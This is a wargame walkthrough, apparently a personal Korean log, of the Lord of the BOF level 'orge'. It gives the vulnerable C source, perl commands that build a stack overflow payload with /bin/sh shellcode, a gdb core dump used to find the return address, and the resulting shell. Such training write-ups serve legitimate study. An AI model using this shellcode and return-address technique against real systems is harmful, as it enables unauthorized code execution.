
[darkelf@localhost darkelf]$ cat orge.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - orge

        - check argv[0]

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


/*
 * Deliberately vulnerable wargame target (LOB "orge"): a 40-byte stack
 * buffer is filled by strcpy() from argv[1], which may be up to 48 bytes.
 * The listing is reproduced as-is: strlen/memset/strcpy are used without
 * <string.h> and main has no return type (pre-C99 implicit declarations).
 * Exits with status 0 on every rejected input; the exploit path falls off the
 * end of main and returns through the overwritten saved return address.
 */
main(int argc, char *argv[])

{

char buffer[40];

int i;


if(argc < 2){

printf("argv error\n");

exit(0);

}


// here is changed!

if(strlen(argv[0]) != 77){ // argv[0] (the invocation path) must be exactly 77 characters long; shorter or longer both fail.

                printf("argv[0] error\n");

                exit(0);

}


// egghunter 

// Zero every environment string so nothing planted in the environment survives
// (kills the env-var shellcode trick). The argv strings are left untouched.
for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));


// Byte 47 of argv[1] must be 0xbf. This index is read BEFORE the length check
// below, so an argv[1] shorter than 48 bytes makes it read past the string's
// terminator (out-of-bounds read). In the build exploited below byte 47 is the
// high byte of the overwritten return address, so the target is forced into
// the 0xbfxxxxxx stack region.
if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}


// check the length of argument

// 48 is still 8 bytes more than buffer, plus the NUL: up to 9 bytes of overflow.
if(strlen(argv[1]) > 48){

printf("argument is too long!\n");

exit(0);

}


// Overflow point: copies up to 49 bytes (48 + NUL) into a 40-byte buffer.
strcpy(buffer, argv[1]); 

printf("%s\n", buffer);


        // buffer hunter

        // Clears only the 40-byte copy; the bytes written past it (the saved
        // return address) and the original argv[1] string are not touched.
        memset(buffer, 0, 40);

}


[darkelf@localhost darkelf]$ .`perl -e 'print "/"x72, "orgi"'` `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x21,"\xc0\xfb\xff\xbf"'`   # 우선은 프로그램명(argv[0]) 길이를 77로 맞추고 공격 시도 (리턴어드레스 \xc0\xfb\xff\xbf 는 아직 추측값)

j

 X?Rh//shh/bin??S?訴€?????????????????????적

Segmentation fault (core dumped)

[darkelf@localhost darkelf]$ gdb -q orgi core

Core was generated by `.////////////////////////////////////////////////////////////////////////orgi j'.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbffffff7 in ?? ()

(gdb) x/50wx $esp

0xbffffa10: 0x00000000 0xbffffa54    0xbffffa60    0x40013868

0xbffffa20: 0x00000002 0x08048450 0x00000000 0x08048471

0xbffffa30: 0x08048500 0x00000002 0xbffffa54    0x08048390

0xbffffa40: 0x0804866c 0x4000ae60 0xbffffa4c    0x40013e90

0xbffffa50: 0x00000002 0xbffffb52    0xbffffba0    0x00000000

0xbffffa60: 0xbffffbd1    0xbffffbe3    0xbffffbfa     0xbffffc19

0xbffffa70: 0xbffffc3b    0xbffffc48    0xbffffe0b    0xbffffe2a

0xbffffa80: 0xbffffe47    0xbffffe5c    0xbffffe7b    0xbffffe86

0xbffffa90: 0xbffffe9e    0xbffffeae    0xbffffeb6    0xbffffec0

0xbffffaa0: 0xbffffed0    0xbffffede    0xbffffeec    0xbffffefd

0xbffffab0: 0xbfffff08     0xbfffff1b     0xbfffff5e     0x00000000

0xbffffac0: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffad0: 0x00000005 0x00000006

(gdb)  

0xbffffad8: 0x00000006 0x00001000 0x00000007 0x40000000

0xbffffae8: 0x00000008 0x00000000 0x00000009 0x08048450

0xbffffaf8: 0x0000000b 0x000001fa 0x0000000c 0x000001fa

0xbffffb08: 0x0000000d 0x000001fa 0x0000000e 0x000001fa

0xbffffb18: 0x00000010 0x0febfbff    0x0000000f 0xbffffb4d

0xbffffb28: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb38: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb48: 0x00000000 0x38366900 0x2f2e0036 0x2f2f2f2f

0xbffffb58: 0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f

0xbffffb68: 0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f

0xbffffb78: 0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f

0xbffffb88: 0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f

0xbffffb98: 0x6f2f2f2f    0x00696772

(gdb) 

0xbffffba0:0x99580b6a 0x2f2f6852      0x2f686873  0x896e6962

0xbffffbb0:0x895352e3 0x9080cde1 0x90909090 0x90909090

0xbffffbc0: 0x90909090 0x90909090 0x90909090 0xbffffbc0

0xbffffbd0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbe0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbf0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc00: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc10: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc20: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc30: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc40: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc50: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc60: 0x00000000 0x00000000

(gdb) quit

[darkelf@localhost darkelf]$ .`perl -e 'print "/"x72, "orgi"'` `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x21,"\xa0\xfb\xff\xbf"'`   # 제대로 된 리턴어드레스(코어 덤프에서 확인한 argv[1]의 시작 주소 0xbffffba0)를 넣고 공격

j

 X?Rh//shh/bin??S?訴€???????????????????????

bash$ exit

exit

[darkelf@localhost darkelf]$ .`perl -e 'print "/"x72, "orge"'` `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x21,"\xa0\xfb\xff\xbf"'`

j

 X?Rh//shh/bin??S?訴€???????????????????????

bash$ my-pass

euid = 507

하하♥

시험공부하겠다며 소셜미디어를 끊고..

엘오비를 하고있네요!!!!!!!!! 이게뭐야!!!!!!!!

NOTES:

argv[0] = 실행할 때 입력한 경로 그대로 (반드시 절대경로일 필요는 없고, 여기서는 `.` + `/`×72 + `orgi` 라는 상대경로). strlen(argv[0]) == 77 검사를 통과해야 한다.

경로 구분자 `/`는 몇 개를 연달아 써도 같은 경로로 해석되므로, `.` 뒤에 `/`를 72개 넣어 길이만 맞추면 된다.

`.`(1글자) + `orgi`(4글자) = 5글자

77-5=72

페이로드는 전단계것을 씀

그런데 쉘코드가 저장되는 곳은 어디일까? 버퍼가 아닌데 → argv[1] 문자열 자체다. 커널이 execve 때 인자 문자열을 스택 위쪽에 복사해 두므로, gdb 덤프의 0xbffffba0 (0x99580b6a = "\x6a\x0b\x58\x99")에 argv[1]이 그대로 남아 있고 리턴어드레스 \xa0\xfb\xff\xbf 가 바로 거기를 가리킨다. strcpy로 buffer에 들어간 사본은 마지막 memset(buffer, 0, 40)으로 지워지지만, buffer 너머에 덮어쓴 리턴어드레스와 원본 argv[1]은 지워지지 않는다. environ은 전부 0으로 지워지므로 환경변수에 쉘코드를 두는 방법은 이 단계에서 막혀 있다.


